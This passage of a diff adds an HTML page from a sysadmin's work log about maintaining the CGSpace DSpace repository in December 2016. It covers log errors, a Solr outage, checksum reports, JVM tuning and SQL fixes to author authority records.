+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-12/">December, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-12-02">2016-12-02</h2>
+<ul>
+<li>CGSpace was down for five hours in the morning while I was sleeping</li>
+<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+</code></pre><ul>
+<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
+<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
+<li>Another worrying error from dspace.log is:</li>
+</ul>
+<pre tabindex="0"><code>org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
+        at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+        at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+        at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:789)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:646)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:727)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:111)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:274)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:170)
+        at com.googlecode.psiprobe.Tomcat70AgentValve.invoke(Tomcat70AgentValve.java:44)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:98)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:313)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+        at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+        at com.atmire.statistics.generator.TopNDSODatasetGenerator.toDatasetQuery(SourceFile:39)
+        at com.atmire.statistics.display.StatisticsDataVisitsMultidata.createDataset(SourceFile:108)
+        at org.dspace.statistics.content.StatisticsDisplay.createDataset(SourceFile:384)
+        at org.dspace.statistics.content.StatisticsDisplay.getDataset(SourceFile:404)
+        at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generateJsonData(SourceFile:170)
+        at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generate(SourceFile:246)
+        at com.atmire.app.xmlui.aspect.statistics.JSONStatsMostPopular.generate(JSONStatsMostPopular.java:145)
+        at sun.reflect.GeneratedMethodAccessor296.invoke(Unknown Source)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+        at com.sun.proxy.$Proxy96.process(Unknown Source)
+        at org.apache.cocoon.components.treeprocessor.sitemap.ReadNode.invoke(ReadNode.java:94)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+        at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+        at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+        at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+        at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+        at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:727)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+        at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
+        at com.sun.proxy.$Proxy89.service(Unknown Source)
+        at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+        at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1180)
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:950)
+        ... 35 more
+</code></pre><ul>
+<li>The first error I see in dspace.log this morning is:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&#34;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&#34;
+org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
+</code></pre><ul>
+<li>Looking through DSpace&rsquo;s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries</li>
+<li>The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&#34;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&#34;++AND+subject_mtdt:&#34;PARTNERSHIPS&#34;+AND+subject_mtdt:&#34;RESEARCH&#34;+AND+subject_mtdt:&#34;AGRICULTURE&#34;+AND+subject_mtdt:&#34;DEVELOPMENT&#34;++AND+iso_mtdt:&#34;en&#34;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
+2016-12-02 08:28:23,908 INFO  org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
+</code></pre><ul>
+<li>DSpace&rsquo;s own Solr logs don&rsquo;t give IP addresses, so I will have to enable Nginx&rsquo;s logging of <code>/solr</code> so I can see where this request came from</li>
+<li>I enabled logging of <code>/rest/</code> and I think I&rsquo;ll leave it on for good</li>
+<li>Also, the disk is nearly full because of log file issues, so I&rsquo;m running some compression on DSpace logs</li>
+<li>Normally these stay uncompressed for a month just in case we need to look at them, so now I&rsquo;ve just compressed anything older than 2 weeks so we can get some disk space back</li>
+</ul>
+<h2 id="2016-12-04">2016-12-04</h2>
+<ul>
+<li>I got a weird report from the CGSpace checksum checker this morning</li>
+<li>It says 732 bitstreams have potential issues, for example:</li>
+</ul>
+<pre tabindex="0"><code>------------------------------------------------ 
+Bitstream Id = 6
+Process Start Date = Dec 4, 2016
+Process End Date = Dec 4, 2016
+Checksum Expected = a1d9eef5e2d85f50f67ce04d0329e96a
+Checksum Calculated = a1d9eef5e2d85f50f67ce04d0329e96a
+Result = Bitstream marked deleted in bitstream table
+----------------------------------------------- 
+...
+------------------------------------------------ 
+Bitstream Id = 77581
+Process Start Date = Dec 4, 2016
+Process End Date = Dec 4, 2016
+Checksum Expected = 9959301aa4ca808d00957dff88214e38
+Checksum Calculated = 
+Result = The bitstream could not be found
+----------------------------------------------- 
+</code></pre><ul>
+<li>The first one seems ok, but I don&rsquo;t know what to make of the second one&hellip;</li>
+<li>I had a look and there is indeed no file with the second checksum in the assetstore (ie, looking in <code>[dspace-dir]/assetstore/99/59/30/...</code>)</li>
+<li>For what it&rsquo;s worth, there is no item on DSpace Test or S3 backups with that checksum either&hellip;</li>
+<li>In other news, I&rsquo;m looking at JVM settings from the Solr 4.10.2 release, from <code>bin/solr.in.sh</code>:</li>
+</ul>
+<pre tabindex="0"><code># These GC settings have shown to work well for a number of common Solr workloads
+GC_TUNE=&#34;-XX:-UseSuperWord \
+-XX:NewRatio=3 \
+-XX:SurvivorRatio=4 \
+-XX:TargetSurvivorRatio=90 \
+-XX:MaxTenuringThreshold=8 \
+-XX:+UseConcMarkSweepGC \
+-XX:+UseParNewGC \
+-XX:ConcGCThreads=4 -XX:ParallelGCThreads=4 \
+-XX:+CMSScavengeBeforeRemark \
+-XX:PretenureSizeThreshold=64m \
+-XX:CMSFullGCsBeforeCompaction=1 \
+-XX:+UseCMSInitiatingOccupancyOnly \
+-XX:CMSInitiatingOccupancyFraction=50 \
+-XX:CMSTriggerPermRatio=80 \
+-XX:CMSMaxAbortablePrecleanTime=6000 \
+-XX:+CMSParallelRemarkEnabled \
+-XX:+ParallelRefProcEnabled \
+-XX:+AggressiveOpts&#34;
+</code></pre><ul>
+<li>I need to try these because they are recommended by the Solr project itself</li>
+<li>Also, as always, I need to read <a href="https://wiki.apache.org/solr/ShawnHeisey">Shawn Heisey&rsquo;s wiki page on Solr</a></li>
+</ul>
+<h2 id="2016-12-05">2016-12-05</h2>
+<ul>
+<li>I did some basic benchmarking on a local DSpace before and after the JVM settings above, but there wasn&rsquo;t anything amazingly obvious</li>
+<li>I want to make the changes on DSpace Test and monitor the JVM heap graphs for a few days to see if they change the JVM GC patterns or anything (munin graphs)</li>
+<li>Spin up new CGSpace server on Linode</li>
+<li>I did a few traceroutes from Jordan and Kenya and it seems that Linode&rsquo;s Frankfurt datacenter is a few less hops and perhaps less packet loss than the London one, so I put the new server in Frankfurt</li>
+<li>Do initial provisioning</li>
+<li>Atmire responded about the MQM warnings in the DSpace logs</li>
+<li>Apparently we need to change the batch edit consumers in <code>dspace/config/dspace.cfg</code>:</li>
+</ul>
+<pre tabindex="0"><code>event.consumer.batchedit.filters = Community|Collection+Create
+</code></pre><ul>
+<li>I haven&rsquo;t tested it yet, but I created a pull request: <a href="https://github.com/ilri/DSpace/pull/289">#289</a></li>
+</ul>
+<h2 id="2016-12-06">2016-12-06</h2>
+<ul>
+<li>Some author authority corrections and name standardizations for Peter:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
+UPDATE 11
+dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
+UPDATE 36
+dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
+UPDATE 14
+dspace=# update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
+UPDATE 42
+dspace=# update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
+UPDATE 360
+dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
+UPDATE 561
+</code></pre><ul>
+<li>Pay attention to the regex to prevent false positives in tricky cases with Dutch names!</li>
+<li>I will run these updates on DSpace Test and then force a Discovery reindex, and then run them on CGSpace next week</li>
+<li>More work on the KM4Dev Journal article</li>
+<li>In other news, it seems the batch edit patch is working, there are no more WARN errors in the logs and the batch edit seems to work</li>
+<li>I need to check the CGSpace logs to see if there are still errors there, and then deploy/monitor it there</li>
+<li>Paola from CCAFS mentioned she also has the &ldquo;take task&rdquo; bug on CGSpace</li>
+<li>Reading about <a href="https://www.postgresql.org/docs/9.5/static/runtime-config-resource.html"><code>shared_buffers</code> in PostgreSQL configuration</a> (default is 128MB)</li>
+<li>Looks like we have ~5GB of memory used by caches on the test server (after OS and JVM heap!), so we might as well bump up the buffers for Postgres</li>
+<li>The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn&rsquo;t dedicated (also runs Solr, which can benefit from OS cache) so let&rsquo;s try 1024MB</li>
+<li>In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):</li>
+</ul>
+<pre tabindex="0"><code>$ time JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace index-authority
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
+real    8m39.913s
+user    1m54.190s
+sys     0m22.647s
+</code></pre><h2 id="2016-12-07">2016-12-07</h2>
+<ul>
+<li>For what it&rsquo;s worth, after running the same SQL updates on my local test server, <code>index-authority</code> runs and completes just fine</li>
+<li>I will have to test more</li>
+<li>Anyways, I noticed that some of the authority values I set actually have versions of author names we don&rsquo;t want, ie &ldquo;Grace, D.&rdquo;</li>
+<li>For example, do a Solr query for &ldquo;first_name:Grace&rdquo; and look at the results</li>
+<li>Querying that ID shows the fields that need to be changed:</li>
+</ul>
+<pre tabindex="0"><code>{
+  &#34;responseHeader&#34;: {
+    &#34;status&#34;: 0,
+    &#34;QTime&#34;: 1,
+    &#34;params&#34;: {
+      &#34;q&#34;: &#34;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
+      &#34;indent&#34;: &#34;true&#34;,
+      &#34;wt&#34;: &#34;json&#34;,
+      &#34;_&#34;: &#34;1481102189244&#34;
+    }
+  },
+  &#34;response&#34;: {
+    &#34;numFound&#34;: 1,
+    &#34;start&#34;: 0,
+    &#34;docs&#34;: [
+      {
+        &#34;id&#34;: &#34;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
+        &#34;field&#34;: &#34;dc_contributor_author&#34;,
+        &#34;value&#34;: &#34;Grace, D.&#34;,
+        &#34;deleted&#34;: false,
+        &#34;creation_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
+        &#34;last_modified_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
+        &#34;authority_type&#34;: &#34;person&#34;,
+        &#34;first_name&#34;: &#34;D.&#34;,
+        &#34;last_name&#34;: &#34;Grace&#34;
+      }
+    ]
+  }
+}
+</code></pre><ul>
+<li>I think I can just update the <code>value</code>, <code>first_name</code>, and <code>last_name</code> fields&hellip;</li>
+<li>The update syntax should be something like this, but I&rsquo;m getting errors from Solr:</li>
+</ul>
+<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true&#39; -H &#39;Content-type:application/json&#39; -d &#39;[{&#34;id&#34;:&#34;1&#34;,&#34;price&#34;:{&#34;set&#34;:100}}]&#39;
+{
+  &#34;responseHeader&#34;:{
+    &#34;status&#34;:400,
+    &#34;QTime&#34;:0},
+  &#34;error&#34;:{
+    &#34;msg&#34;:&#34;Unexpected character &#39;[&#39; (code 91) in prolog; expected &#39;&lt;&#39;\n at [row,col {unknown-source}]: [1,1]&#34;,
+    &#34;code&#34;:400}}
+</code></pre><ul>
+<li>When I try using the XML format I get an error that the <code>updateLog</code> needs to be configured for that core</li>
+<li>Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
+UPDATE 561
+</code></pre><ul>
+<li>Then I&rsquo;ll reindex discovery and authority and see how the authority Solr core looks</li>
+<li>After this, now there are authorities for some of the &ldquo;Grace, D.&rdquo; and &ldquo;Grace, Delia&rdquo; text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):</li>
+</ul>
+<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true&#39;
+{
+  &#34;responseHeader&#34;:{
+    &#34;status&#34;:0,
+    &#34;QTime&#34;:0,
+    &#34;params&#34;:{
+      &#34;q&#34;:&#34;id:18ea1525-2513-430a-8817-a834cd733fbc&#34;,
+      &#34;indent&#34;:&#34;true&#34;,
+      &#34;wt&#34;:&#34;json&#34;}},
+  &#34;response&#34;:{&#34;numFound&#34;:1,&#34;start&#34;:0,&#34;docs&#34;:[
+      {
+        &#34;id&#34;:&#34;18ea1525-2513-430a-8817-a834cd733fbc&#34;,
+        &#34;field&#34;:&#34;dc_contributor_author&#34;,
+        &#34;value&#34;:&#34;Grace, Delia&#34;,
+        &#34;deleted&#34;:false,
+        &#34;creation_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
+        &#34;last_modified_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
+        &#34;authority_type&#34;:&#34;person&#34;,
+        &#34;first_name&#34;:&#34;Delia&#34;,
+        &#34;last_name&#34;:&#34;Grace&#34;}]
+  }}
+</code></pre><ul>
+<li>So now I could set them all to this ID and the name would be ok, but there has to be a better way!</li>
+<li>In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!</li>
+<li>Better to use:</li>
+</ul>
+<pre tabindex="0"><code>dspace#= update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
+</code></pre><ul>
+<li>This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!</li>
+<li>Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID</li>
+<li>Deploy MQM WARN fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/289">#289</a>)</li>
+<li>Deploy &ldquo;take task&rdquo; hack/fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/290">#290</a>)</li>
+<li>I ran the following author corrections and then reindexed discovery:</li>
+</ul>
+<pre tabindex="0"><code>update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
+update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
+update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
+update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
+update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
+update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
+</code></pre><h2 id="2016-12-08">2016-12-08</h2>
+<ul>
+<li>Something weird happened and Peter Thorne&rsquo;s names all ended up as &ldquo;Thorne&rdquo;, I guess because the original authority had that as its name value:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne%&#39;;
+    text_value    |              authority               | confidence
+------------------+--------------------------------------+------------
+ Thorne, P.J.     | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+ Thorne           | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
